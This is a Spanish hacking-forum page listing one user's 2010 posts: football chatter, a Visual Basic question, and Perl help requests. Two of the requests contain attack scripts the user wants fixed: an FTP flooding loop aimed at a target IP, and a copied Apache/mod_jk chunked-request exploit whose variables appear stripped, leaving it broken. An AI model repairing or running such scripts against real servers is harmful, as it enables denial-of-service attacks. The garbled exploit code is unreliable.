elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Foros Generales / Foro Libre / Re: Gana España... El Pulpo Atinó! en: 12 Julio 2010, 03:37 am
12  Foros Generales / Foro Libre / Algunas fotos del triunfo de España jijijiji en: 12 Julio 2010, 02:17 am




13  Programación / Scripting / Re: ¿Alguien me puede decir que esta mal? en: 25 Junio 2010, 17:18 pm
grax
14  Programación / Scripting / ¿Alguien me puede decir que esta mal? [Perl][Solucionado] en: 25 Junio 2010, 03:26 am
El mensaje de error a compilar el archivo perl es este:
Código:
Name "main::perl" used only once: possible typo at roto2.pl line 4.
Use of uninitialized value $ARGV[0] in string at roto2.pl line 4.
Use of uninitialized value $ARGV[0] in concatenation (.) or string at roto2.pl line 4
Use of uninitialized value $perl in concatenation (.) or string at roto2.pl line 4.
Cannot connect to Host

y el codigo es:

Código:
#!/usr/bin/perl -w

use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";

while(1)
{
#this loop runs infinitely

$ftp -> cwd();
}

$ftp->quit;
15  Foros Generales / Foro Libre / Re: Podemoss!! Podemoss!! España 0-1 Suiza - Buena partido de Suiza en: 17 Junio 2010, 03:46 am
Pátetico el verdadero autor del hilo que se ha creado una cuenta aposta para intentar "restregarnos" un partido de futbol el cual tiene la misma importancia en nuestras vidas que los lloriqueos y envidias de muchos acia todo lo que respresente España y que en vez de intentar "molestar" deberían mejorar o ayudar a sus países de origen que bastante tienen ya económicamente pero sus politicos aprovechan el deporte para aborregarlos y hacer que se olviden que es posible que mañana les echen del trabajo o no cobren.
16  Programación / Scripting / Re: [?]Perl ¿Qué estoy haciendo mal? en: 15 Junio 2010, 18:27 pm
Código
  1.  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u

Sí vas a comentar se más explicito, no para sumar absurdos mensajes.
Gracias.
17  Programación / Scripting / [?]Perl ¿Qué estoy haciendo mal? en: 15 Junio 2010, 14:12 pm
Buenas, según el compilador tengo el siguiente error en la siguiente linea:
Código:
syntax error at pruebaa.pl line 17, near "="

y aquí el codigo en cuestión:

Código:
#!/usr/bin/perl -w

use IO::Socket;

 "= Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "\n By Sapient2003\n";
  die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";

 "= GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";

  = IO::Socket::INET->new(                          [Esta es la linea)))
        PeerAddr => [0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host [0]\n";
print  ;
print "Attempted to exploit [0]\n";
close();

18  Programación / Programación Visual Basic / Re: Ejecucion de distintos formularios en mismo proyecto en: 15 Mayo 2010, 22:03 pm
¿Ya probaste poner un fomulario MDI? :huh: (Los Formularios MDI son para estos casos)

Salu2! ;)

Gracias por tu respuesta amigo, pero en el MIDIform1 no me deja añadir ni botones ni texto que ocurre?
19  Programación / Programación Visual Basic / Ejecucion de distintos formularios en mismo proyecto en: 15 Mayo 2010, 21:33 pm
 Buenos Dias.

Estoy utilizando Visual BAsic 6.0.

Mi problema es el siguiente:

Tengo un grupo de proyecto creado en visual basic 6.00 con 2 formularios y deseo que al hacer click sobre un boton este ejecute el formulario 2:
Ejemplo:

+ProyectoInicial
---Formulario 1 ---- Click en boton "A"
---Formulario 2 se ejecuta en la misma ventana.
20  Programación / Scripting / Re: Script para Ubuntu no responda con RST ante un SYN/ACK en: 8 Marzo 2010, 17:08 pm
He descubierto que se puede hacer con iptables, funcionaria de este modo?

Código:
iptables A INPUT -p tcp tcpflags SYN, RST j DROP
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines